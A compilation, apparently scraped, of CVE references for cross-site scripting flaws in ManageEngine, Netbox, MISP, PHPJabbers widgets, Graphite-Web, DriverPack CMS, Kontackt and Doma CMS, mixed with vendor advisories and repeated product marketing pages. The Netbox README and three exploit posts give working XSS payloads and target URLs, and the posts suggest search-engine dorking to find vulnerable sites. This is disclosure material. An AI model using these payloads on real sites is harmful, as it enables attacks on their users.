Zoho ManageEngine Applications Manager through 16530 allows reflected XSS while logged in.

**Reflected XSS Vulnerability**  

Vulnerability Details

Severity

**High**

CVE ID

CVE-2023-38333

Affected software versions

Version 16530 and below

Fixed Version

Version 16367 to 16369  
Version 16424 to 16429  
Version 16512 to 16519  
Version 16540 and above

Fixed On

3 July 2023

**Details**

Reflected XSS Vulnerability in a login url allows attacker to craft a malicious JavaScript payload. When clicking the crafted url that is shared by an attacker, malicious JavaScript gets executed in the victim browser.

**Impact**

This vulnerability executes JavaScript in the victim's browser controlled by the attacker to carry out any of the actions that are applicable to the corresponding role of the victim in Applications Manager.

**Fix**

Applications Manager version 16540 and above fixes this issue by using proper defence mechanisms against Cross-Site Scripting(XSS) vulnerability.

**Steps to update**

Update your Applications Manager instance to the latest build using the service pack.

**Source and Acknowledgements**

Find out more about CVE-2023-38333 from CVE Directory and NIST NVD.

**Reported by:**

Anonymous working with Trend Micro Zero Day Initiative.

**Need Help?**

For clarification or corrections please contact our support team or email us at appmanager-support@manageengine.com

CVE-2023-38333: Security Updates - CVE Details - CVE-2023-38333

A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

benjaminpsinclair / **Netbox-CVE-2023-37625** Public

*   Notifications
*   Fork 0
*   Star 0
    

0 stars 0 forks Activity

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Git stats**

*   **2** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

README.md

Netbox-CVE-2023-37625 Description Technical Details

**README.md**

**Netbox-CVE-2023-37625****Description**

A stored cross-site scripting (XSS) vulnerability in Netbox < 3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the custom link function of the web application. This vulnerability is a result of insufficient sanitisation of the Link URL field.

To reproduce this vulnerability, the following steps may be performed:

1.  Navigate to Custom Links under the Other tab.
2.  Create a custom link with the following Link URL value, and assign the link to a model. In this example 'manufacturer' has been selected.:

    {{'test1"</a><script>alert(1)</script>'}}
    

3.  Add a new model, in this example add a 'manufacturer' model.

4.  Open the newly created model as any authenticated user, and observer that the alert box has executed.

**About**

No description, website, or topics provided.

**Resources**

Readme

Activity

**Stars**

**0** stars

**Watchers**

**1** watching

**Forks**

**0** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published

CVE-2023-37625: GitHub - benjaminpsinclair/Netbox-CVE-2023-37625

MISP 2.4174 allows XSS in app/View/Events/index.ctp.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40224: fix: [security] XSS in event index · MISP/MISP@0274f8b

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Key Features

One admiN

Extended Licence

Installation Support

Payment Gateways

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36315: Callback Widget | Callback Button

PHPJabbers Document Creator v1.0 is vulnerable to Cross Site Scripting (XSS) via all post parameters of "Export Requests" aside from "request_feed".

CVE-2023-36313

There is a Cross Site Scripting (XSS) vulnerability in the value-enum-o_bf_include_timezone parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Extended Licence

High Performance

Remote Hosting

Customizations

Key Features

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36312: Callback Widget | Callback Button

Ubuntu Security Notice 6243-2 - USN-6243-1 fixed vulnerabilities in Graphite-Web. It was discovered that the applied fix was incomplete. This update fixes the problem. It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform server-side request forgery and obtain sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6243-2  
August 09, 2023

graphite-web regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

USN-6243-1 caused a minor regression in Graphite-Web.

Software Description:  
- graphite-web: A highly scalable real-time graphing system

Details:

USN-6243-1 fixed vulnerabilities in Graphite-Web. It was discovered that the  
applied fix was incomplete. This update fixes the problem.

Original advisory details:

  It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
  user or an automated system were tricked into opening a specially crafted  
  input file, a remote attacker could possibly use this issue to perform  
  server-side request forgery and obtain sensitive information. This issue  
  only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2017-18638)

  It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
  user or an automated system were tricked into opening a specially crafted  
  input file, a remote attacker could possibly use this issue to perform  
  cross site scripting and obtain sensitive information. (CVE-2022-4728,  
  CVE-2022-4729, CVE-2022-4730)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    1.0.2+debian-2ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6243-2  
   https://ubuntu.com/security/notices/USN-6243-1  
   https://launchpad.net/bugs/2030807

Ubuntu Security Notice USN-6243-2

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

Discussion On Kontackt The Exclusive PHP Social Network Platform version 1.18 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/social-plus-ultimate-social-network-platform/21391853                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new user https://127.0.0.1/ .[+] use payload in search box : <script>alert(/indoushka/);</script>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Discussion On Kontackt 1.18 Cross Site Scripting

Doma CMS version 1.0 suffers from a cross site scripting vulnerability.

    ==========================================================================================| # Title     : Doma CMS v1.0 xss Vulnerability                                          || # Author    : indoushka                                                                || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)  || # Vendor    : http://www.matstroeng.se/doma/                                           |  | # Dork      : Digital Orienteering Map Archive, version 1.0 | Log in                   |==========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22[+] http://127.0.0.1/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#xss